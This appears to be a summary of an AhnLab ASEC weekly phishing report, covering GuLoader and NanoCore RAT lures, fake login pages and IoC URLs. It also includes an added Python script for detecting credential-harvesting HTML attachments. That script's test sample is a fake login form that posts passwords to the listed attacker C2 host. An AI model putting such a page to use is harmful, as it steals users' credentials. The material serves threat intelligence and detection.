ASEC Weekly Phishing Email Threat Trends (June 4th 2023 – June 10th, 2023) – ASEC BLOG

ASEC tracked phishing email threats focusing on attachments used to deliver malware via downloaders, infostealers, and fake login pages during the week of June 4–10, 2023. The report details attack types, distribution methods, notable cases, and practical user precautions to reduce risk. #GuLoader #NanoCoreRAT #HometaxTaxBill #FakePage

Keypoints

  • By attachment type, the most prevalent categories were Downloader (37%), Infostealer (29%), FakePage (18%), Trojan (15%), and Exploit (1%).
  • FakePages imitate real login pages to harvest credentials and direct users to attacker C2 servers or fake sites.
  • Attachments used in these campaigns included HTML/HTM/SHTML variants for FakePages and compressed files (RAR, ZIP, GZ, 7Z, etc.) for malware delivery.
  • A notable case used the “Hometax Tax Bill” theme: NTS_eTaxInvoice-pdf.zip carried the GuLoader downloader, which the report ties to follow-on NanoCore RAT remote access.
  • FakePage C2 URLs are listed, showing multiple domains used to collect credentials and stage further infection.
  • Keywords to beware include “Hometax Tax Bill,” with guidance to verify sources, avoid executing unfamiliar attachments, and use security software.
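As an added triage example (not code from the ASEC report), the script below shows how a mail gateway or analyst could screen HTML/HTM/SHTML attachments for the FakePage pattern described above: a page that asks for a password and submits it, via a form action or an inline script, to a host other than the sender's claimed domain. The two C2 URLs come from the report's IoC list; the sample HTML, the `claimed_domain` parameter, and the function names are constructed for this example.

```python
"""Screen HTML mail attachments for credential-harvesting (FakePage) behaviour.

Added example, not part of the ASEC report. A page is flagged when it
collects a password and submits it somewhere outside the claimed sender
domain; a hit against the report's C2 hosts is reported separately.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# FakePage C2 URLs taken from the report's IoC list (the remaining ones are
# not reproduced on this page, so only these two are checked here).
KNOWN_C2 = {
    "regulateantelope.sa.com/slim/fdpxoGur23f.php",
    "regulateantelope.sa.com/funn/fdpxoGur23f.php",
}
KNOWN_C2_HOSTS = {u.split("/")[0] for u in KNOWN_C2}

PASSWORD_NAME = re.compile(r"pass(word|wd)?|pwd", re.I)
JS_URL = re.compile(r"""https?://[^\s'"<>]+""")


class FormCollector(HTMLParser):
    """Collect form actions, input fields and inline <script> text."""

    def __init__(self):
        super().__init__()
        self.actions, self.inputs, self.scripts = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.actions.append(a.get("action", ""))
        elif tag == "input":
            self.inputs.append((a.get("type", "text"), a.get("name", "")))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:          # html.parser hands script bodies to handle_data
            self.scripts.append(data)


def _same_org(host, domain):
    """True when host is domain itself or a subdomain of it."""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


def triage_attachment(html_text, claimed_domain):
    """Return a verdict dict for one HTML attachment.

    claimed_domain is the domain the email purports to come from (hypothetical
    input to this example); a credential form submitting elsewhere is suspicious.
    """
    pc = FormCollector()
    pc.feed(html_text)
    asks_for_password = any(
        t.lower() == "password" or PASSWORD_NAME.search(n) for t, n in pc.inputs
    )
    targets = set(pc.actions)
    for script in pc.scripts:
        targets.update(JS_URL.findall(script))
    external = sorted(
        urlparse(t).netloc.lower() + urlparse(t).path
        for t in targets
        if urlparse(t).netloc and not _same_org(urlparse(t).netloc, claimed_domain)
    )
    c2_hits = [t for t in external if t.split("/")[0] in KNOWN_C2_HOSTS]
    return {
        "asks_for_password": asks_for_password,
        "external_targets": external,
        "known_c2_hits": c2_hits,
        "suspicious": asks_for_password and bool(external),
    }


# Constructed sample resembling a FakePage attachment. The markup is invented;
# only the two C2 URLs are from the report's IoC list.
SAMPLE_FAKEPAGE = """
<html><body>
<form id="login" method="POST" action="https://regulateantelope.sa.com/slim/fdpxoGur23f.php">
  <input type="email" name="email" value="victim@example.com">
  <input type="password" name="passwd">
  <button type="submit">Sign in</button>
</form>
<script>
  fetch("https://regulateantelope.sa.com/funn/fdpxoGur23f.php", {method: "POST"});
</script>
</body></html>
"""

if __name__ == "__main__":
    print(triage_attachment(SAMPLE_FAKEPAGE, "example.com"))
```

The host check treats subdomains of the claimed domain as legitimate, so a page that posts to `login.example.com` from an `example.com` sender is not flagged; anything that posts off-domain while asking for a password is, whether or not the host is already on the IoC list.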

MITRE Techniques

  • [T1566] Phishing (Initial Access) – phishing emails deliver attachments (compressed archives, HTML pages) that drop or download loaders and backdoors.
  • [T1598] Phishing for Information (Reconnaissance) – FakePage attachments collect IDs and passwords rather than executing malware.
  • [T1534] Internal Spearphishing (Lateral Movement) – credentials harvested by the fake login pages can be reused to send further phishing from within the victim organization.

Indicators of Compromise

  • [URL] FakePage C2 endpoints – regulateantelope.sa.com/slim/fdpxoGur23f.php, regulateantelope.sa.com/funn/fdpxoGur23f.php (two paths on the same host), and 10 more URLs in the full report
  • [Attachment] Malware delivery attachments – NTS_eTaxInvoice-pdf.zip, Tax_Notification.html, and 2 more items
  • [Hash] Trojan/Downloader payload hash (MD5) – ED9A4BBACD25426E9403E7847619F5BE

Read more: https://asec.ahnlab.com/en/54662/